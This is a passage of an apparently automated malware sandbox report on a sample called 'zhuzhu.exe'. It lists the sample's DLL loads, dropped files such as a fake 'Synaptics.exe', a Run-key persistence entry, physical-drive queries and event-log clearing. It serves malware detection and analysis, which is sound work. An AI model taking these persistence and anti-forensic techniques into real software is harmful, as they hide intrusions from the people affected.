                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                      Source: C:\Users\user\Desktop\zhuzhu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\cmmNnpH.ini
                                      Source: Window RecorderWindow detected: More than 3 window changes detected
                                      Source: C:\Users\user\Downloads\inst.exeWindow detected: Number of UI elements: 24
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
                                      Source: zhuzhu.exeStatic file information: File size 6061056 > 1048576
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
                                      Source: zhuzhu.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x51d400
                                      Source: Binary string: \Release\Code_Shellcode.pdb source: ._cache_zhuzhu.exe, ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\249110\out\Release\360P2SP.pdb source: inst.exe, 00000007.00000003.1803199164.0000000003C95000.00000004.00000020.00020000.00000000.sdmp, inst.exe, 00000007.00000002.4158731034.000000005F54F000.00000002.00000001.01000000.00000010.sdmp, 360P2SP.dll.7.dr
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdbX source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr
                                      Source: Binary string: Attempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContext source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: SAttempt to access uninitialized member object: TVEProcessPacket.PdbForwarderContextSVWU source: zhuzhu.exe, ._cache_zhuzhu.exe.1.dr, ._cache_zhuzhu.exe.0.dr, Synaptics.exe.0.dr
                                      Source: Binary string: \Release\Code_Shellcode.pdb(!!GCTL source: ._cache_zhuzhu.exe, 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmp, ._cache_zhuzhu.exe, 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp
                                      Source: Binary string: C:\vmagent_new\bin\joblist\832091\out\Release\360Installer.pdb source: inst.exe, 00000007.00000002.4138601555.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 00000007.00000000.1759892249.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000000.1770278594.000000000021E000.00000002.00000001.01000000.0000000C.sdmp, inst.exe, 0000000C.00000002.1778901612.000000000021E000.00000002.00000001.01000000.0000000C.sdmp
                                      Source: Binary string: c:\vmagent_new\bin\joblist\312713\out\Release\sites.pdb source: inst.exe, 00000007.00000002.4159349307.0000000062BE5000.00000002.00000001.01000000.00000012.sdmp, sites.dll.7.dr

                                      Data Obfuscation

                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeUnpacked PE file: 1.2.._cache_zhuzhu.exe.400000.0.unpack
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exeCode function: 1_2_10001170 LoadLibraryW,GetProcAddress,GetProcAddress,GetModuleHandleA,RegisterClassW,CreateWindowExW,GetMessageW,TranslateMessage,DispatchMessageW,1_2_10001170
                                      Source: ._cache_zhuzhu.exe.1.drStatic PE information: real checksum: 0x5142eb should be: 0x5110e9
                                      Source: ~$cache1.2.drStatic PE information: real checksum: 0x0 should be: 0xc1c51
                                      Source: zhuzhu.exeStatic PE information: real checksum: 0x0 should be: 0x5cd873
                                      Source: ._cache_zhuzhu.exe.0.drStatic PE information: real checksum: 0x5142eb should be: 0x5110e9
                                      Source: RCXE77E.tmp.0.drStatic PE information: real checksum: 0x0 should be: 0xc1c51
                                      Source: Synaptics.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x5cd873
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_09C8F104 push cs; retf 2_2_09C8F15C
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_09C8F1A8 push ecx; ret 2_2_09C8F1A9
                                      Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 2_2_09C8F131 push cs; retf 2_2_09C8F15C
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03784345 push ecx; ret 4_2_03784358
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0379A168 push eax; ret 4_2_0379A119
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_0379A0B8 push eax; ret 4_2_0379A119
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03792470 push ebp; retf 4_2_03792474
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03792450 push ebp; retf 4_2_03792474
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03792438 push ebp; retf 4_2_03792474
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C7FE9A push ecx; ret 4_2_02C7FEBF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02C69DF5 push ecx; ret 4_2_02C69E08
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCAFF push eax; retf 4_2_02BDCB00
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCB0B push 701000CBh; retf 4_2_02BDCB10
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCB07 pushad ; retf 4_2_02BDCB08
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BDCB61 pushfd ; retf 4_2_02BDCB64
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_02BD9DCC push ecx; ret 4_2_02BD9DDF
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exeCode function: 4_2_03603D04 push ecx; ret 4_2_03603D17
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E4821 push ecx; ret 7_2_001E4834
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00177330 push ecx; mov dword ptr [esp], 00000000h7_2_00177331
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001E54F9 push ecx; ret 7_2_001E550C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_001639B0 push ecx; mov dword ptr [esp], 00000000h7_2_001639B1
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_00163C30 push ecx; mov dword ptr [esp], 00000000h7_2_00163C31
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 7_2_5F52BD51 push ecx; ret 7_2_5F52BD64
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00178144 push dword ptr [ebp+ebp*8+3Bh]; ret 12_2_00178149
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E4821 push ecx; ret 12_2_001E4834
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00177330 push ecx; mov dword ptr [esp], 00000000h12_2_00177331
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001E54F9 push ecx; ret 12_2_001E550C
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_001639B0 push ecx; mov dword ptr [esp], 00000000h12_2_001639B1
                                      Source: C:\Users\user\Downloads\inst.exeCode function: 12_2_00163C30 push ecx; mov dword ptr [esp], 00000000h12_2_00163C31

                                      Persistence and Installation Behavior

                                      Source: C:\Users\user\Downloads\inst.exeCode function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d7_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exeCode function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d7_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 7_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D1BEB
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exe Code function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d 7_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d 12_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 12_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exe Code function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d 12_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D1BEB
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe File created: C:\Users\user\Documents\DTBZGIOOSO\~$cache1
                                      Source: C:\Users\user\Desktop\zhuzhu.exe File created: C:\ProgramData\Synaptics\RCXE77E.tmp
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\inst[1].exe
                                      Source: C:\Users\user\Desktop\zhuzhu.exe File created: C:\ProgramData\Synaptics\Synaptics.exe
                                      Source: C:\Users\user\Desktop\zhuzhu.exe File created: C:\Users\user\Desktop\._cache_zhuzhu.exe
                                      Source: C:\Users\user\Downloads\inst.exe File created: C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe File created: C:\Users\user\Downloads\inst.exe
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe File created: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                      Source: C:\Users\user\Downloads\inst.exe File created: C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_001CDA24 GetPrivateProfileStringW, 7_2_001CDA24
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_00199A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64, 7_2_00199A0C
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_5F4FFE46 GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,GetPrivateProfileIntW,GetPrivateProfileIntW,_memset,_wcslen,_memset,inet_addr,inet_addr,_memset,_wcslen,_memset,inet_addr,inet_addr,_wcslen,__wcslwr,wsprintfW, 7_2_5F4FFE46
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 12_2_00199A0C _memset,SHGetValueW,PathAppendW,PathAppendW,PathAppendW,PathFileExistsW,GetPrivateProfileIntW,__time64, 12_2_00199A0C
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 12_2_001CDA24 GetPrivateProfileStringW, 12_2_001CDA24

                                      Boot Survival

                                      Source: C:\Users\user\Downloads\inst.exe Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d 7_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 7_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d 7_2_001D1BEB
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _malloc,SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exe Code function: DeviceIoControl,CreateFileA,DeviceIoControl,_malloc,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 7_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d 7_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: __EH_prolog3,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D2158
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,DeviceIoControl,CloseHandle,_memset,CloseHandle, \\.\PhysicalDrive%d 12_2_001E2210
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,CreateFileA,_memset,DeviceIoControl,_memset,CloseHandle, \\.\PhysicalDrive%d 12_2_001E25D0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: SetLastError,CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_001666F0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileA,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_00166759
                                      Source: C:\Users\user\Downloads\inst.exe Code function: DeviceIoControl,CreateFileA,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_001E2760
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,DeviceIoControl,DeviceIoControl,CloseHandle,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 12_2_001768A0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: CreateFileW,_memset,DeviceIoControl,CloseHandle,_memset,_memset,StrTrimA,StrTrimA,CloseHandle, \\.\PhysicalDrive%d 12_2_00176AE0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D18BD
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,_memset,_memcpy_s,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D1A51
                                      Source: C:\Users\user\Downloads\inst.exe Code function: _memset,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PHYSICALDRIVE%d 12_2_001D1BEB
                                      Source: C:\Users\user\Desktop\zhuzhu.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver

                                      Hooking and other Techniques for Hiding and Protection

                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_001BA4F6 __EH_prolog3,IsIconic,ShowWindow, 7_2_001BA4F6
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_00196727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop, 7_2_00196727
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_00195C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos, 7_2_00195C31
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 12_2_00196727 FindWindowW,ShowWindow,IsWindowVisible,IsIconic,BringWindowToTop, 12_2_00196727
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 12_2_00195C31 IsWindow,IsIconic,ShowWindow,ShowWindow,IsWindowVisible,ShowWindow,SetForegroundWindow,SetWindowPos,SetWindowPos,SetWindowPos, 12_2_00195C31
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Code function: 4_2_0377B3C0 OpenEventLogW,OpenEventLogW,ClearEventLogW,CloseEventLog, 4_2_0377B3C0
                                      Source: C:\Users\user\Downloads\inst.exe Code function: 7_2_00185706 __EH_prolog3,_memset,GetWindowsDirectoryW,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_00185706
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                                      Source: C:\ProgramData\Synaptics\Synaptics.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                                      Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe Key value created or modified: HKEY_CURRENT_USER\Console\0 9e9e85e05ee16fc372a0c7df6549fbd4
                                      Source: C:\Users\user\Desktop\zhuzhu.exe Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Desktop\._cache_zhuzhu.exe Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                                      Source: C:\Users\user\Downloads\inst.exe Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
